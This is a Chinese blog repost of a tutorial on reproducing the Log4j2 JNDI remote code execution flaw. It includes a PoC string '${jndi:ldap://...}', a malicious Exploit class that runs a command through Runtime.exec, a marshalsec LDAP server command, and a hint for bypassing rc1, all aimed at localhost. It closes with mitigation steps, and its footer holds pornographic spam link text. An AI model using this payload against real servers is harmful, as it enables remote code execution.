<kbd id="afajh"><form id="afajh"></form></kbd>
<strong id="afajh"><dl id="afajh"></dl></strong>
    <del id="afajh"><form id="afajh"></form></del>
        1. <th id="afajh"><progress id="afajh"></progress></th>
          <b id="afajh"><abbr id="afajh"></abbr></b>
          <th id="afajh"><progress id="afajh"></progress></th>

          千萬別中招!手把手教你復(fù)現(xiàn)Log4j2漏洞!

          共 320字,需瀏覽 1分鐘

           ·

          2021-12-18 15:45

          來源:https://blog.csdn.net/qq_40989258/article/details/121862363

          |?簡介

          ApacheLog4j2是一個開源的Java日志框架,被廣泛地應(yīng)用在中間件、開發(fā)框架與Web應(yīng)用中。

          | 漏洞概述

          該漏洞是由于Apache Log4j2某些功能存在遞歸解析功能,未經(jīng)身份驗(yàn)證的攻擊者通過發(fā)送特定惡意數(shù)據(jù)包,可在目標(biāo)服務(wù)器上執(zhí)行任意代碼。

          | 影響范圍

          Apache Log4j 2.x <= 2.15.0-rc1

          | 環(huán)境搭建

          創(chuàng)建一個新的maven項(xiàng)目,并導(dǎo)入Log4j的依賴包
          <dependency>
          ????<groupId>org.apache.logging.log4jgroupId>
          ????<artifactId>log4j-coreartifactId>
          ????<version>2.14.1version>
          dependency>

          | 漏洞利用

          1 使用POC測試

          import?org.apache.logging.log4j.LogManager;
          import?org.apache.logging.log4j.Logger;
          class?LogTest?{
          ????public?static?final?Logger?logger?=?LogManager.getLogger();
          ????public?static?void?main(String[]?args)?{
          ????????logger.error("${jndi:ldap://localhost:8888/Exploit}");
          ????}
          }
          2 編譯一惡意類Exploit.class

          首先新建exp.java,然后編譯為class文件。

          class?Exploit?{
          ????static?{
          ????????System.err.println("Pwned");
          ????????try?{
          ????????????String?cmds?=?"calc";
          ????????????Runtime.getRuntime().exec(cmds);
          ????????}?catch?(?Exception?e?)?{
          ????????????e.printStackTrace();
          ????????}
          ????}
          }

          javac exp.java

          3 使用marshalsec-0.0.3-SNAPSHOT-all.jar本地開啟一個LDAP服務(wù)
          java?-cp?marshalsec-0.0.3-SNAPSHOT-all.jar?marshalsec.jndi.LDAPRefServer
          "http://127.0.0.1:7777/#Exploit"?8888

          4 運(yùn)行poc.java,即可訪問惡意類并執(zhí)行寫在其中的"calc"命令

          結(jié)合一些其它 StrLookup 適當(dāng)變形,以及配合官方測試用例中臟數(shù)據(jù)"?Type=A Type&Name=1100110&Char=!"可繞過rc1,RC2版本對此異常進(jìn)行了捕獲。

          https://github.com/apache/logging-log4j2/compare/log4j-2.15.0-rc1...log4j-2.15.0-rc2

          | 修復(fù)方式

          目前,Apache官方已發(fā)布新版本完成漏洞修復(fù),建議用戶盡快進(jìn)行自查,并及時升級至最新版本:

          https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

          建議同時采用如下臨時措施進(jìn)行漏洞防范:
          • 添加jvm啟動參數(shù)-Dlog4j2.formatMsgNoLookups=true
          • 在應(yīng)用classpath下添加log4j2.component.properties配置文件,文件內(nèi)容為log4j2.formatMsgNoLookups=true
          • JDK使用11.0.1、8u191、7u201、6u211及以上的高版本;
          • 部署使用第三方防火墻產(chǎn)品進(jìn)行安全防護(hù)。



          END


          推薦閱讀

          一鍵生成Springboot & Vue項(xiàng)目!【畢設(shè)神器】

          Java可視化編程工具系列(一)

          Java可視化編程工具系列(二)


          順便給大家推薦一個GitHub項(xiàng)目,這個 GitHub 整理了上千本常用技術(shù)PDF,絕大部分核心的技術(shù)書籍都可以在這里找到,

          GitHub地址:https://github.com/javadevbooks/books

          Gitee地址:https://gitee.com/javadevbooks/books

          電子書已經(jīng)更新好了,你們需要的可以自行下載了,記得點(diǎn)一個star,持續(xù)更新中..


          瀏覽 45
          點(diǎn)贊
          評論
          收藏
          分享

          手機(jī)掃一掃分享

          分享
          舉報(bào)
          評論
          圖片
          表情
          推薦
          點(diǎn)贊
          評論
          收藏
          分享

          手機(jī)掃一掃分享

          分享
          舉報(bào)
          <kbd id="afajh"><form id="afajh"></form></kbd>
          <strong id="afajh"><dl id="afajh"></dl></strong>
            <del id="afajh"><form id="afajh"></form></del>
                1. <th id="afajh"><progress id="afajh"></progress></th>
                  <b id="afajh"><abbr id="afajh"></abbr></b>
                  <th id="afajh"><progress id="afajh"></progress></th>
                  成年人黄色视频在线观看 | 亚洲免费黄色片 | 欧美视频中文在线看 | 伊人网大香蕉视频在线观看 | 台湾无码在线观看 |